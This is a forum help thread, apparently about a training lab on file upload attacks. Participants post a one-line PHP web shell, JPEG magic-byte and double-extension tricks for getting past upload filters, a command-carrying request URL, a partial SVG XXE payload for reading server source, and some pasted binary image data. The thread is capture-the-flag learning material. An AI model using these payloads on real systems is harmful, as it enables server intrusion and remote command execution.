Hello,
I have a problem with solving the Skills Assessment - File Upload Attacks.
Here are the steps I followed:
I created a shell.php file with the following code:
<?php
system($_REQUEST['cmd']);
?>`
يُرجى استخدام الرمز بحذر. مزيد من المعلومات
content_copy
I used a hex editor to convert the file to JPEG format by adding the following bytes:
FF D8 FF EE
I changed the file extension to .phar.jpeg. I uploaded the file to a website and it was successfully uploaded. I tried to view the source code of the file by going to the following URL:
view-source:http://94.237.59.12:38629/contact/user_feedback_submissions/test2.phar.jpeg?cmd=cd%20../../../../../;ls
At this point, I do not get any results, and even viewing the source code does not show any results.
Can some one help me? Thanks
Hey! Looks like you are really close.
I would first try to get the source code in a similar way to the Limited File Uploads section. Once you have the upload.php source code you should be able to see what is happening on the back end. The image file gets modified during the upload process.
Take a look at the source code of upload.php and you will see.
I try this code
<!DOCTYPE svg <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=upload.php
&xxe;
But it didn’t work
plexing
November 19, 2024, 10:27pm
4
did the same steps and modified the url to get prefix date to filename. but when i open the url, i only get this string and not the flag.txt:
�����JFIF������� �a���������������������������������( ��%���!1!%)+…��383-7(-.+� � �e���- ��-----±-/.-/–±–±------±±--------+.----------���������"��������e�����������a��;������� ���������!1��AQaq���"2������R�#Bbr����a�$������������������+���������������!1��A�Qaq�#����"2����������?�������ϲ�Qh�K!d-��d (������� V)�x(\��Ač��@N��Yv,���U�H�>�a,����w{ ;{G�"�H֨S��?w> _Qr��+��[��#�ؿ�g~(E�H���f������|�J\c��������]}�=�x���)��Q�dh��)+L�Ӌ����v
